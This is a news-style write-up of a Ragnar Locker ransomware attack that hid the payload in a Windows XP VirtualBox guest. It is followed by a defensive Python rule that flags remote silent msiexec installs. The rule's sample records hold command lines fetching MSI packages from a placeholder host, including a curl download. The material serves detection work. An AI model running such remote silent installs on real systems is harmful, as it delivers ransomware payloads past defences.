Threat actors have developed a new type of attack method by hiding Ragnar Locker ransomware inside a virtual machine to avoid detection
The post describes a Ragnar Locker ransomware attack that “takes defense evasion to a new level.” According to the post, this variant was deployed inside a Windows XP virtual machine to hide the malicious code from anti-malware detection. The virtual machine runs on an old version of Sun xVM VirtualBox, a free, open-source hypervisor that passed to Oracle when it acquired Sun Microsystems in 2010.
“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,”
The MSI package contained Sun xVM VirtualBox version 3.0.4, released in August 2009, and “an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82.” Inside that image is a 49 KB Ragnar Locker executable.
“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,”
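As an added defender-side example (not code from the article or from the post it summarizes), the following Python scores Sysmon-style process-creation records for the first step described above: msiexec.exe launched with a remote URL and a silent-install switch. The field names, the sample records and the SYSTEM-account heuristic are assumptions made for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation records in Sysmon Event ID 1 style; they are
# illustrative samples, not telemetry from the incident described above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://package-host.invalid/installer.msi /qn",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\alice\Downloads\7z.msi /qn",
     "User": "CORP\\alice"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /package https://package-host.invalid/tool.msi",
     "User": "CORP\\bob"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl http://package-host.invalid/x.msi",
     "User": "CORP\\carol"},
]

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# msiexec unattended switches: /q, /qn, /qb, /qr, /qf, /quiet, /passive
SILENT_SWITCH = re.compile(r"(?:^|\s)/(?:q\w*|quiet|passive)\b", re.IGNORECASE)


def msiexec_reasons(event: Dict[str, str]) -> List[str]:
    """Return why an msiexec launch looks like a remote (silent) package install.
    An empty list means the event is of no interest to this rule."""
    if not event.get("Image", "").lower().endswith("\\msiexec.exe"):
        return []
    cmd = event.get("CommandLine", "")
    if not REMOTE_URL.search(cmd):
        return []  # local packages are routine; only remote fetches are flagged
    reasons = ["package fetched from remote URL"]
    if SILENT_SWITCH.search(cmd):
        reasons.append("silent install switch")
    # Assumption for the example: a GPO-driven task typically runs as SYSTEM,
    # so that account raises the score; it is a heuristic, not a hard rule.
    if event.get("User", "").upper().endswith("SYSTEM"):
        reasons.append("runs as SYSTEM (consistent with GPO-driven execution)")
    return reasons


def find_remote_msi_installs(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (command line, reasons) for every event the rule flags."""
    hits = []
    for event in events:
        reasons = msiexec_reasons(event)
        if reasons:
            hits.append((event["CommandLine"], reasons))
    return hits
```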
This is the first time virtual machines have been seen used in a ransomware attack.
It’s unclear how many organizations were affected by this recent attack and how widespread it was. In the past, the Ragnar Locker ransomware group has targeted managed service providers and used their remote access to clients to infect more organizations.